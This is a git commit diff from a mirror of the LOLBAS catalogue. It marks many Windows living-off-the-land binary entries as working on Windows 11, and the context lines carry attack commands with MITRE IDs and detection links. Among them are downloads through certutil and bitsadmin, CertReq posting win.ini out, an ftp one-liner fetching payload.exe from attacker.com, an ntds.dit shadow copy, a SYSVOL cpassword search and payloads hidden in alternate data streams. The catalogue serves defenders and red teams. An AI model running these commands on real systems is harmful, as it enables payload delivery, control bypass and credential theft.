mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
Updating entries that have been confirmed to be working on Windows 11 (21H2)
This commit is contained in:
parent
f7b30775a4
commit
754a451e76
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||
Detection:
|
||||
|
@ -1,27 +1,27 @@
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
Description: Command for copying cmd.exe to another folder
|
||||
Usecase: Copy file
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
|
||||
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
|
||||
Usecase: Upload
|
||||
Category: Upload
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certreq.exe
|
||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||
|
@ -10,42 +10,42 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||
Description: Command to encode a file using Base64
|
||||
Usecase: Encode files to evade defensive measures
|
||||
Category: Encode
|
||||
Privileges: User
|
||||
MitreID: T1027
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
||||
Description: Command to decode a Base64 encoded file.
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
Privileges: User
|
||||
MitreID: T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
Privileges: User
|
||||
MitreID: T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1059.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: cmd.exe - < fakefile.doc:payload.bat
|
||||
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1059.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1078
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdl32.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1218.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
@ -23,7 +23,7 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||
- IOC: Control.exe executing files from alternate data streams
|
||||
- IOC: Control.exe executing library file without cpl extension
|
||||
- IOC: Control.exe executing library file without cpl extension
|
||||
- IOC: Suspicious network connections from control.exe
|
||||
Resources:
|
||||
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: csc -target:library File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||
Code_Sample:
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
|
@ -10,42 +10,43 @@ Commands:
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
||||
Usecase: Extract hidden file within alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||||
Description: Copies the source EXE to the destination EXE file
|
||||
Usecase: Use to copy files from one unc path to another
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||
Description: Copies a (locked) file using Volume Shadow Copy
|
||||
Usecase: Copy/extract a locked file such as the AD Database
|
||||
Category: Copy
|
||||
Privileges: Admin
|
||||
MitreID: T1003.003
|
||||
OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
|
||||
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
|
||||
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||
Description: Copies source file to destination.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Description: Copies source file to destination Alternate Data Stream (ADS)
|
||||
Usecase: Copies files from A to B
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10 (Tested)
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\explorer.exe
|
||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||
|
@ -10,28 +10,28 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
Description: Copy the source file to the destination file and overwrite it.
|
||||
Usecase: Download file from UNC/WEBDav
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
|
||||
Description: Command for copying calc.exe to another folder
|
||||
Usecase: Copy file
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
|
@ -10,28 +10,28 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
|
||||
Description: Search for stored password in Group Policy files stored on SYSVOL.
|
||||
Usecase: Find credentials stored in cpassword attrbute
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1552.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||||
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
|
||||
Usecase: Download/Copy file from webdav server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1185
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: Admin
|
||||
MitreID: T1562.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\fltMC.exe
|
||||
Code_Sample:
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||||
Description: Download
|
||||
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ftp.exe
|
||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: Gpscript /startup
|
||||
Description: Executes startup scripts configured in Group Policy
|
||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: Executes calc.exe with HTML Help.
|
||||
Usecase: Execute process with HH.exe
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||
Detection:
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ie4uinit.exe
|
||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||
|
@ -10,13 +10,14 @@ Commands:
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
